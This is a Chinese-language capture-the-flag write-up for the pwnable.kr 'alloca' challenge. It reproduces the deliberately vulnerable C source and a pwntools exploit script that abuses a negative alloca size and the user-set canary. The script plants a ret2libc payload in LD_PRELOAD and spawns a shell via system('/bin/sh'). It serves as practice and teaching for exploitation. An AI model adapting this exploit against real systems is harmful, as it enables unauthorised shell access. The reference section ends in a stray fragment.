pwnable.kr -- alloca

CTF

0x00:

好久没玩了…去年十月以后就没玩过了TAT 这几天把peach的坑,winafl的坑填了下,就来搞下pwn。

0x01:

这个程序是给了源码的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void clear_newlines(){
    int c;
    do{
        c = getchar();
    }while (c != '\n' && c != EOF);
}
int g_canary;
int check_canary(int canary){
    int result = canary ^ g_canary;
    int canary_after = canary;
    int canary_before = g_canary;
    printf("canary before using buffer : %d\n", canary_before);
    printf("canary after using buffer : %d\n\n", canary_after);
    if(result != 0){
        printf("what the f...??? how did you fucked this buffer????\n");
    }
    else{
        printf("I told you so. its trivially easy to prevent BOF :)\n");
        printf("therefore as you can see, it is easy to make secure software\n");
    }
    return result;
}
int size;
char* buffer;
int main(){
    printf("- BOF(buffer overflow) is very easy to prevent. here is how to.\n\n");
    sleep(2);
    printf("   1. allocate the buffer size only as you need it\n");
    printf("   2. know your buffer size and limit the input length\n\n");
    printf("- simple right?. let me show you.\n\n");
    sleep(2);
    printf("- whats the maximum length of your buffer?(byte) : ");
    scanf("%d", &size);
    clear_newlines();
        printf("- give me your random canary number to prove there is no BOF : ");
        scanf("%d", &g_canary);
        clear_newlines();
    printf("- ok lets allocate a buffer of length %d\n\n", size);
    sleep(1);
    buffer = alloca( size + 4 );    // 4 is for canary
    printf("- now, lets put canary at the end of the buffer and get your data\n");
    printf("- don't worry! fgets() securely limits your input after %d bytes :)\n", size);
    printf("- if canary is not changed, we can prove there is no BOF :)\n");
    printf("$ ");
    memcpy(buffer+size, &g_canary, 4);    // canary will detect overflow.
    fgets(buffer, size, stdin);        // there is no way you can exploit this.
    printf("\n");
    printf("- now lets check canary to see if there was overflow\n\n");
    check_canary( *((int*)(buffer+size)) );
    return 0;
}

主要还是需要突破他的防护,拿到shell。
看下bin文件开了什么保护:

调试发现,check_canary()函数返回的时候,如果恰当的设置g_canary的值,就可以控制返回地值。

然后我就卡在这里了…开启了NX,只能ROP的思路搞,但是ROP链又不知道哪里放置。

0x02:

后来参考了别人的做法,才发现这是个本地利用…直接按照以前玩overthewire学来的套路就可以:sc放在环境变量离,然后确定地址,直接改返回地值过去就可以了。
不过首先要利用ulimit -s unlimited去固定下libc的加载地址,然后才可以确定system()和/bin/sh地址。

附上我本地调试的时候的exp,环境不同,所以地址可能不同。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
import os
off_system  = 0x0003d3e0    # objdump -d /lib/i386-linux-gnu/libc.so.6 | grep system
off_shell   = 0x0015ea69    # grep -oba /bin/sh /lib/i386-linux-gnu/libc.so.6
adr_libc    = 0x40047000    # ldd alloca
adr_payload = 0x40025857    # searchmem "AAAA"
payload     =   p32(adr_libc + off_system)
payload     +=  p32(0xdeadbeef)
payload     +=  p32(adr_libc + off_shell)
#test = "AAAABBBBCCCC"
#p = process('./alloca', env = {'LD_PRELOAD': test})
p = process('./alloca', env = {'LD_PRELOAD': payload})
#raw_input("$$")
p.sendline(str(-92))
p.sendline(str((adr_payload + 4) ^ 0x08048250))
p.interactive()
'''
0x40025857 ^ 0x08048250 --> 0x4806da07
Cannot access memory at address 0x4806da03
0x40025857 + 4
'''

0x03:参考链接

0byjwzsf